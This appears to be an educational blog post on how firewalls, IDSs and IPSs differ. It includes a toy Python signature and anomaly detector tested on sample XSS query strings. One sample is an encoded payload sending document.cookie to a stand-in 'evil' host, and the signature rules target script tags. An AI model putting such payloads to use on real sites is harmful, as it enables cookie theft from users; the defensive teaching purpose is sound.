What's the difference between a Firewall and an IDS?
Let's say that Application A is vulnerable to XSS (Cross-Site Scripting), i.e. it has a bug, and attackers can send malicious traffic to this application that, by exploiting the bug, can harm the server or the people who use it. A firewall can only permit or block people's access to this application; it can never know whether the traffic is malicious or not. A traditional firewall filters on the packet's 5-tuple (source and destination addresses, source and destination ports, and protocol), so it inspects traffic only up to layer 4 (the Transport Layer). The XSS payload lives inside the HTTP request itself, in a URL parameter or form field at layer 7 (the Application Layer), hence another solution is needed in order to inspect traffic up there. This solution is called an IDS, or Intrusion Detection System.
How does an IDS work?
But what kind of magic does an IDS do in order to detect those attacks? We are now in the application layer and there is no 5-tuple to inspect anymore, so IDSs use various techniques to detect attacks. Let's go back to our XSS example. With Signature Based Detection, the IDS reassembles the HTTP request and looks inside it for known attack patterns, such as a <script> tag inside a URL parameter or form field. With Behavior Analysis (also called anomaly detection), the IDS first learns what normal traffic to the application looks like and then fires an alarm on requests that deviate from it, whether or not they match any known pattern.
Gr33n Data: Cross Site Scripting - XSS
By the way, the antivirus software you use on your PC uses similar techniques to detect malware. And you know what, the antivirus updates you download every now and then are files containing the signatures it uses for Signature Based Detection. And yes, an IDS needs to get periodic updates too, just like an antivirus, otherwise it cannot recognize attacks published after its last update.
Signature Based Detection is more accurate than Behavior Analysis in detecting attacks, since a match against a known pattern rarely fires on legitimate traffic, but it can detect known attacks only, while Behavior Analysis can detect both known and unknown attacks, the latter sometimes called Zero-Day Attacks, at the price of more false alarms. That's why Intrusion Detection Systems depend on both techniques together, and sometimes they implement further proprietary techniques on top.
Accuracy, what do I mean by accuracy?
When there is an attack and the IDS doesn't detect it, this is called a False Negative; on the other hand, when there is no attack and the IDS thinks there is one, this is called a False Positive. A good IDS is one that minimizes both False Negatives and False Positives, which pull in opposite directions: tuning a detector to be more sensitive catches more attacks but also fires on more legitimate traffic.
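To make the two detection techniques and the accuracy terms concrete, here is an added Python example; it is not code from the original post nor from any IDS vendor. It runs a toy signature-based detector and a toy behaviour-analysis detector over a handful of constructed HTTP query strings labelled with ground truth, and scores each as True/False Positives and Negatives. The two signature rules, the learning-period traffic, the test requests and their labels are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed rules (not a vendor's rule set): the kind of known-bad pattern a
# signature-based IDS carries for XSS.  They are matched on the URL-decoded
# parameter value so that %3Cscript%3E cannot slip past the rule.
SIGNATURES = {
    "xss-script-tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "xss-javascript-uri": re.compile(r"javascript\s*:", re.IGNORECASE),
}

# Constructed known-good traffic: the "learning period" for behaviour analysis.
BENIGN_TRAINING = [
    "q=laptops",
    "q=top+10+laptops+2008",
    "q=how+to+write+a+%3Cb%3Ebold%3C%2Fb%3E+tag+(html)",
    "id=42",
    "name=john+smith&page=2",
]

# Constructed test traffic with ground truth: (query string, is_attack).
TEST_REQUESTS = [
    ("q=laptops", False),
    ("q=<script>alert(1)</script>", True),             # textbook XSS, known pattern
    ("q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil%2F%27"
     "%2Bdocument.cookie%3C%2Fscript%3E", True),       # URL-encoded cookie theft
    ("name=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E", True),  # no <script>: signatures miss it
    ("q=c%2B%2B+tutorial", False),                     # legitimate but unusual search
    ("id=7", False),
]


def parse(query):
    """Split a query string into URL-decoded (name, value) pairs."""
    return parse_qsl(query, keep_blank_values=True)


def signature_detect(query):
    """Signature Based Detection: return the rules that fire on any parameter value."""
    return [rule for _, value in parse(query)
            for rule, pattern in SIGNATURES.items() if pattern.search(value)]


def char_class(ch):
    """Letters, digits and whitespace are pooled into classes; punctuation is kept as itself."""
    if ch.isalpha():
        return "alpha"
    if ch.isdigit():
        return "digit"
    if ch.isspace():
        return "space"
    return ch


def learn_profile(training_queries):
    """Behaviour Analysis, learning phase: per parameter, remember the character
    classes and the longest value seen in known-good traffic."""
    profile = {}
    for query in training_queries:
        for name, value in parse(query):
            p = profile.setdefault(name, {"classes": set(), "max_len": 0})
            p["classes"].update(char_class(c) for c in value)
            p["max_len"] = max(p["max_len"], len(value))
    return profile


def anomaly_detect(query, profile):
    """Behaviour Analysis, detection phase: flag a value that uses character classes
    never seen for that parameter, or that is far longer than any learned value.
    Returns human-readable reasons; an empty list means the request looks normal."""
    reasons = []
    for name, value in parse(query):
        p = profile.get(name)
        if p is None:
            reasons.append(f"{name}: parameter never seen during learning")
            continue
        unseen = sorted({char_class(c) for c in value} - p["classes"])
        if unseen:
            reasons.append(f"{name}: unseen character classes {unseen}")
        if len(value) > 2 * p["max_len"]:
            reasons.append(f"{name}: length {len(value)} exceeds twice the learned maximum")
    return reasons


def evaluate(labelled_queries, detector):
    """Score a detector against ground truth as TP / FP / FN / TN counts."""
    counts = {"tp": 0, "fp": 0, "fn": 0, "tn": 0}
    for query, is_attack in labelled_queries:
        flagged = bool(detector(query))
        key = ("tp" if is_attack else "fp") if flagged else ("fn" if is_attack else "tn")
        counts[key] += 1
    return counts


PROFILE = learn_profile(BENIGN_TRAINING)


def combined_detect(query):
    """What a real IDS does: run both engines and alert if either one fires."""
    return signature_detect(query) + anomaly_detect(query, PROFILE)


if __name__ == "__main__":
    for label, detector in [("signatures", signature_detect),
                            ("behaviour", lambda q: anomaly_detect(q, PROFILE)),
                            ("both", combined_detect)]:
        print(f"{label:10s} {evaluate(TEST_REQUESTS, detector)}")
```

Run it and the three printed lines are each engine's confusion matrix. The signatures catch the two <script> payloads and miss the onerror one (a False Negative). The behaviour engine catches the onerror payload but also flags the harmless "c++ tutorial" search (a False Positive) and, because the learning period already saw angle brackets, digits and parentheses in the q parameter, waves the textbook alert(1) payload through. Only the two engines together catch every attack, and they inherit the behaviour engine's false alarm.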
IDS is dead, long live the IPS
An IDS is more complicated than a firewall; it needs more processing and analysis, which may impose some delay. It's also not fully accurate, as we just saw. That's why people preferred not to deploy IDSs inline. The traffic doesn't pass through them; they just see a copy of it (from a switch mirror port or a network tap), and they do not take any action to block or permit traffic. They are passive devices that fire an alarm whenever they detect an attack, and it is then up to a human to respond.
And that's why, a few years ago, a new technology was born. An IPS (Intrusion Prevention System) is just an IDS that is deployed inline and is capable of taking the decision to block or permit traffic. By doing so, IPS vendors were forced to improve both the accuracy of their products (a False Positive now drops legitimate traffic instead of merely raising an alarm) and their processing power (every packet must be analyzed before it is forwarded).
Nowadays the top players in the IPS field are TippingPoint (3Com), IntruShield (McAfee), NetScreen IDP (Juniper), and ISS Proventia (IBM). Cisco also has its own "IPS". And if you are an Open Source fan, you can try Snort; the Snort project has good documentation and papers.
Tags: IPS, Attacks, Gr33n Data